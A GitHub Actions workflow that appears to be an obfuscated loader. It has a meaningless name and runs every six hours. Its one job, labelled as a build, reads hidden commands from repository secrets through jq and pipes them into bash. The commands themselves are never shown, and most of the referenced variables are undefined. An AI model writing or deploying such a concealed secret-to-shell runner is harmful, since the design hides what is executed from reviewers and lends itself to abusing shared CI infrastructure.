name: yanjiaxin4635
on:
  workflow_dispatch:
  schedule:
    - cron: '30 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yanjiaxin4635
        env:
          to639: ${{ secrets.to639 }}
        run: |
          echo $to639 | jq -r .r5769 | /bin/bash
          echo $kq702 | jq -r .rveyu31324 | /bin/bash
          echo $coepi03 | jq -r .l10169 | /bin/bash
          echo $uq4 | jq -r .n51127 | /bin/bash
          echo $rmz03604 | jq -r .gow5740 | /bin/bash
          echo $fmybx5186 | jq -r .vuuoi1 | /bin/bash
          echo $grvdp07 | jq -r .l91 | /bin/bash
          echo $m6318 | jq -r .ad2735 | /bin/bash
          echo $kez84298 | jq -r .bpik196 | /bin/bash
          echo $sj7 | jq -r .w21 | /bin/bash
          echo $udx9 | jq -r .asbp756 | /bin/bash
          echo $oy089 | jq -r .c53 | /bin/bash

